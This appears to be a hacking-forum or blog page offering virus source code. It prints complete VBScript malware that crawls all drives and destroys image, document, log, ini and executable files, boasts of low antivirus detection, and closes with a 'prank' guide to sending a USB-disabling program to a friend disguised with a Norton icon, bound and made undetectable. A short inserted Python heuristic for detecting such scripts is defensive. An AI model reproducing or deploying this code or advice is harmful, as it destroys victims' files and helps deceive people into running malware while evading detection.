Virus Makers.

Source Code of Virus

Here is some code that overwrites files with the .jpg, .doc, .exe, .gif, .log and .ini extensions with "You have been infected" and changes them into .txt

I will try to change the code so it can have more stealth when dealing with antivirus programs.


Code:
On Error Resume Next

Dim FSobj, winDir, sysDir, copySelf, newFile, rawFileData, hackedFileData, fixData, dataFixed, newFileData
Set FSobj = CreateObject("Scripting.FileSystemOject")
Set sysDir = FSobj.GetSpecialFolder(1)

beginInfestation()

sub beginInfestation()
On Error Resume Next
Dim drive,machine
Set machine = FSobj.Drives
for each drive in machine
if (drive.type = 2) or (drive.type = 3) then
indexFolders(drive.Path&"\")
end if
next
end sub

sub indexFolders(location)
On Error Resume Next
Dim specs, file, subFol
Set specs = FSobj.GetFolder(location)
subFol = specs.SubFolders
for each file in subFol
spreadData(file.Path)
indexFolders(file.Path)
next
end sub

sub spreadData(location)
On Error Resume Next
Dim folder, directory, file, generateCopy, appName, adExt, orgMes, mesStageTwo, mesStageThree, finalMes, extName
Set folder = FSobj.GetFolder(location)
Set directory = folder.Files
orgMes = "You have been infected!"
esStageTwo=replace(orgMes,chr(42),chr(68))
mesStageThree=replace(mesStageTwo,chr(124),chr(46))
finalMes=replace(mesStageThree,chr(37),chr(76))
for each file in directory
extName=lcase(FSobj.GetExtensionName(file.Path))

if (extName="jpg")or(extName="gif")then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)

elseIf (extName="log")or(extName="ini") then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)

elseIf (extName="doc")or(extName="exe") then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)
end if
next
end sub




Some antivirus programs will pick this up. It is written in VBScript (.vbs extension).

UPDATE: 2/41 Antivirus programs picked this up. Scan done by virustotal:

Code:
a-squared 4.5.0.24 2009.08.06 -
AhnLab-V3 5.0.0.2 2009.08.05 -
AntiVir 7.9.0.240 2009.08.05 -
Antiy-AVL 2.0.3.7 2009.08.05 -
Authentium 5.1.2.4 2009.08.06 -
Avast 4.8.1335.0 2009.08.06 -
AVG 8.5.0.406 2009.08.05 -
BitDefender 7.2 2009.08.06 -
CAT-QuickHeal 10.00 2009.08.05 -
ClamAV 0.94.1 2009.08.05 VBS.Pluta.A
Comodo 1880 2009.08.06 -
DrWeb 5.0.0.12182 2009.08.06 -
eSafe 7.0.17.0 2009.08.05 -
eTrust-Vet 31.6.6660 2009.08.05 -
F-Prot 4.4.4.56 2009.08.05 -
F-Secure 8.0.14470.0 2009.08.05 -
Fortinet 3.120.0.0 2009.08.05 -
GData 19 2009.08.06 -
Ikarus T3.1.1.64.0 2009.08.06 -
Jiangmin 11.0.800 2009.08.05 -
K7AntiVirus 7.10.811 2009.08.05 -
Kaspersky 7.0.0.125 2009.08.06 -
McAfee 5699 2009.08.05 -
McAfee+Artemis 5699 2009.08.05 -
McAfee-GW-Edition 6.8.5 2009.08.06 -
Microsoft 1.4903 2009.08.04 Virus:VBS/Generic1
NOD32 4310 2009.08.05 -
Norman 6.01.09 2009.08.05 -
nProtect 2009.1.8.0 2009.08.05 -
Panda 10.0.0.14 2009.08.05 -
PCTools 4.4.2.0 2009.08.05 -
Prevx 3.0 2009.08.06 -
Rising 21.41.24.00 2009.08.05 -
Sophos 4.44.0 2009.08.05 -
Sunbelt 3.2.1858.2 2009.08.05 -
Symantec 1.4.4.12 2009.08.06 -
TheHacker 6.3.4.3.377 2009.08.05 -
TrendMicro 8.950.0.1094 2009.08.05 -
VBA32 3.12.10.9 2009.08.06 -
ViRobot 2009.8.5.1869 2009.08.05 -
VirusBuster 4.6.5.0 2009.08.05 -
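
Only 2 of the 41 engines above flagged the script by signature. A defender can instead score a .vbs file on the combination of behaviours it contains, as in this added Python example (not part of the original post): the indicator names, weights and threshold are assumptions, the first sample quotes lines from the script above, and the second is a constructed benign script.

```python
import re

# Behaviours visible in the script above. Weights and threshold are assumptions
# chosen for this example, not values from any antivirus product.
INDICATORS = {
    "fso_created":     (r'CreateObject\s*\(\s*"Scripting\.FileSystem\w*"', 1),
    "drive_enum":      (r'\.Drives\b', 2),
    "recursive_walk":  (r'\.SubFolders\b', 1),
    "open_for_write":  (r'\.OpenTextFile\s*\([^,\n]+,\s*(?:2|ForWriting)\b', 2),
    "delete_file":     (r'\.DeleteFile\b', 2),
    "errors_silenced": (r'^\s*On\s+Error\s+Resume\s+Next', 1),
}
THRESHOLD = 6

def strip_comments(source):
    """Drop whole-line VBScript comments (' or Rem) so dead code is not scored."""
    return "\n".join(ln for ln in source.splitlines()
                     if not re.match(r"\s*('|rem\b)", ln, re.IGNORECASE))

def score_script(source):
    """Return (score, sorted indicator names) for one script's text."""
    code = strip_comments(source)
    hits = [name for name, (pat, _) in INDICATORS.items()
            if re.search(pat, code, re.IGNORECASE | re.MULTILINE)]
    return sum(INDICATORS[n][1] for n in hits), sorted(hits)

def is_suspicious(source):
    return score_script(source)[0] >= THRESHOLD

# Lines quoted from the script on this page (typo in the ProgID included).
PAGE_EXCERPT = r"""On Error Resume Next
Set FSobj = CreateObject("Scripting.FileSystemOject")
Set machine = FSobj.Drives
subFol = specs.SubFolders
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
FSobj.DeleteFile (file.Path)
"""

# Constructed benign admin script: appends to one log; risky calls appear only in a comment.
BENIGN_LOGGER = r"""' old version used fso.DeleteFile and walked fso.Drives
Set fso = CreateObject("Scripting.FileSystemObject")
Set log = fso.OpenTextFile("C:\Logs\backup.log", 8, True)
log.WriteLine "backup finished"
log.Close
"""

if __name__ == "__main__":
    for label, text in (("page excerpt", PAGE_EXCERPT), ("benign logger", BENIGN_LOGGER)):
        print(label, score_script(text), is_suspicious(text))
```

The heuristic reads only whole-line comments as dead code, so a trailing comment on a code line is still scored.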


Creating a Virus to Disable USB Ports



Do you want to play a prank with your friend’s computer by disabling their USB ports? If so here is a nice trick to do that! In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the victim will not be able to use his pen drive or any other USB peripheral on his computer. The source code for this virus along with the compiled module is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports. Here is a step by step procedure to start playing the prank on your friend’s computer.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
  • block_usb.exe
  • unblock_usb.exe
3. Out of these 4 files the block_usb.exe is the virus that will block (disable) all the USB ports on the computer upon execution (double click). You need to send this file to your friend. Once he executes it it’ll block all the USB ports on his computer.
4. Before sending you can test it on your own computer. To test, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe file. Now insert the pen drive and it should get detected.
5. The block_usb.c and unblock_usb.c are the source codes. You can compile them yourself if you’re interested (this is optional).
6. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.
7. You can also change the icon of this file to make it look like a legitimate program. Example Take the Icon of Norton or something else and Bind the Exe File with it with any Binder. And Use Software PassPort to make it Undetectable.
I hope you like this post. Please pass your comments.
WARNING: This post is for educational purposes only. Do not misuse it.



